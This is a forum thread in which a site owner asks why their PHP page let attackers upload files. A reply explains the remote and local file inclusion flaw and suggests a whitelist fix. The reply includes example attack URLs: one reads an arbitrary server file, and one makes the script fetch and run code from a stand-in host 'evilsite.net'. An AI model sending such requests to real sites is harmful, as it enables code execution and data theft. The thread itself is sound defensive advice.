Announcement

Collapse
No announcement yet.

Can Someone Help With PHP Being Exploited?

Collapse
X
  • Filter
  • Time
  • Show
Clear All
new posts

  • Can Someone Help With PHP Being Exploited?

    So.... I have gotten notice from my host that malicious files have been being uploaded to my site. When I asked how, they said that they were being uploaded through this PHP code. Could someone explain to me how and if it's possible to stop the exploit? For the time being, I have just removed the PHP and I am using standard HTML.
    Attached Files

  • #2
    Your script does have a huge security hole in it. Let's look at two lines in particular to see why:
    PHP Code:
    $currentpage $_GET['filename'];
    // counter stuff
    include $currentpage
    Of course you intend for $currentpage to contain one of the files in the array you put at the beginning of your script. But in practice, you're accepting anything the user might choose to put in the 'filename' parameter of their GET request. This works fine for something like
    Code:
    http://yoursite.com/personal.php?filename=dogcom.htm
    But unfortunately for you, it also works for
    Code:
    http://yoursite.com/personal.php?filename=%2Fetc%2Fyour_secret_file.txt
    (%2F is a forward slash) and thus the client can use this script to view any file on your server (at least, any file that the account running your web server has permission to access).

    But it gets worse. PHP's include() function doesn't just dump the contents of a file onto the page for the client to view. It executes those contents as PHP code. AND it has the ability to include not just files on your server but files from anywhere on the Internet. So your client could make a request like this:
    Code:
    http://yoursite.com/personal.php?filename=http:%2F%2Fevilsite.net%2Fevil_code.php
    and this would cause your script to happily go and load the contents of that file (whatever they might be), execute them, and put the result on the page.

    In short, your script allows anyone to execute any code on your server. They can create files or wreak havoc in any way they like. The only thing limiting what they can do is the permission level of the account your web server runs as.

    To fix this, you need to ensure that what the user put in the 'filename' parameter is actually something in your list. You're already using a while loop to iterate over all of the items in the list, so just check at the end to see if you actually found $currentfile in there. If you didn't, simply exit your script before calling include() and don't bother returning anything to the user.

    There's one other bug in your script that I see at first glance. Your while loop runs while $counter is less than or equal to $numberofpages. But when $counter is equal to $numberofpages, the resulting index is actually out of range, as arrays in PHP are indexed starting with 0. So you need to do instead:
    PHP Code:
    while ($counter $numberofpages) { 
    and then later:
    PHP Code:
    if ($counter $numberofpages 1) { 
    so that you aren't referencing array indexes that don't exist.
    Last edited by jansennerd10; 08-05-2018, 12:37 PM. Reason: Put example URLs in [CODE] tags to prevent them from being interpreted as actual URLs

    Comment

    Working...
    X